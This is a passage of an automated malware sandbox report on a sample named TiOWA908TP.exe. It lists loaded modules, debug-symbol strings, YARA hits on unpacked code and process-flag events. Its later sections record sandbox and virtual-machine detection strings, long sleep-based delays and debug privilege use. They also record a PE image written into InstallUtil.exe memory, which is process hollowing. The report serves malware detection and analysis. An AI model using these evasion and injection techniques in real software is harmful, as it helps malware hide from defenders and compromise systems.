                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: TiOWA908TP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: TiOWA908TP.exeStatic file information: File size 104857600 > 1048576
                Source: TiOWA908TP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000001.00000002.5823783639.0000000000BC8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: ((.pdb3s( source: InstallUtil.exe, 00000001.00000002.5823783639.0000000000BC8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n.pdb source: InstallUtil.exe, 00000001.00000002.5823783639.0000000000BC8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbp source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: TiOWA908TP.exe, 00000000.00000002.4831977172.00000000054F0000.00000004.08000000.00040000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.4829248242.0000000003729000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdb source: TiOWA908TP.exe, 00000000.00000002.4838355628.000000007111B000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.00000000010C6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: TiOWA908TP.exe, 00000000.00000002.4847834302.00000000712FB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: TiOWA908TP.exe, 00000000.00000002.4831977172.00000000054F0000.00000004.08000000.00040000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.4829248242.0000000003729000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: TiOWA908TP.exe, 00000000.00000002.4836639493.00000000066E0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdbRSDS source: TiOWA908TP.exe, 00000000.00000002.4847834302.00000000712FB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: \??\C:\Windows\System.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: HP~n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000001.00000002.5823783639.0000000000BC8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbvi source: InstallUtil.exe, 00000001.00000002.5824131154.00000000010C6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: TiOWA908TP.exe, 00000000.00000002.4838355628.000000007111B000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdbe source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\InstallUtil.pdbl source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: TiOWA908TP.exe, 00000000.00000002.4838355628.000000007111B000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: System.Drawing.pdb source: TiOWA908TP.exe, 00000000.00000002.4847834302.00000000712FB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb4 source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdbHm source: InstallUtil.exe, 00000001.00000002.5823783639.0000000000BC8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.00000000010AD000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBD source: InstallUtil.exe, 00000001.00000002.5824131154.00000000010C6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbpx source: InstallUtil.exe, 00000001.00000002.5824131154.00000000010C6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000001.00000002.5823783639.0000000000BC8000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb~ source: InstallUtil.exe, 00000001.00000002.5824131154.0000000001058000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 0.2.TiOWA908TP.exe.6580000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.TiOWA908TP.exe.6580000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4815695727.000000000276D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4836173880.0000000006580000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: TiOWA908TP.exe PID: 6584, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7596, type: MEMORYSTR
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_05562C57 pushfd ; ret 0_2_05562C61
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_055660F8 pushfd ; ret 0_2_05566105
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063E64D1 push es; retf 0_2_063E6580
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063E653B push es; retf 0_2_063E6580
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063E9576 push es; ret 0_2_063E95AC
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063E1290 push es; ret 0_2_063E1320
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063E4849 push es; ret 0_2_063E484C
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_063E493C push es; ret 0_2_063E4944
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_0663C04A pushad ; retf 0_2_0663C051
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06663132 pushfd ; iretd 0_2_06663133
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06663D76 push edi; ret 0_2_06663D7E
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06663D49 push edi; ret 0_2_06663D7E
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06763DBD push edx; ret 0_2_06763DBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_02D64B78 push eax; retf 1_2_02D64B7D
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: TiOWA908TP.exe PID: 6584, type: MEMORYSTR
                Source: TiOWA908TP.exe, 00000000.00000002.4815695727.000000000276D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory allocated: 25A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory allocated: 2720000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory allocated: 4720000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2F60000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4F60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeCode function: 0_2_06631113 smsw word ptr [ebx+06h]0_2_06631113
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeWindow / User API: threadDelayed 9951Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 2792Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 2792Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 1360Thread sleep count: 9951 > 30Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 2792Thread sleep time: -99875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 2792Thread sleep time: -99766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 2792Thread sleep time: -99657s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 2792Thread sleep time: -99532s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 2792Thread sleep time: -99407s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 2792Thread sleep time: -99282s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 2792Thread sleep time: -99157s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 2792Thread sleep time: -99047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 2792Thread sleep time: -98938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 2792Thread sleep time: -98813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99875Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99766Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99657Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99532Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99407Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99282Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99157Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99047Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98938Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98813Jump to behavior
                Source: TiOWA908TP.exe, 00000000.00000002.4815695727.000000000276D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                Source: TiOWA908TP.exe, 00000000.00000002.4815695727.000000000276D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                Source: TiOWA908TP.exe, 00000000.00000002.4812714389.0000000000773000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45C000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45E000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D09008Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
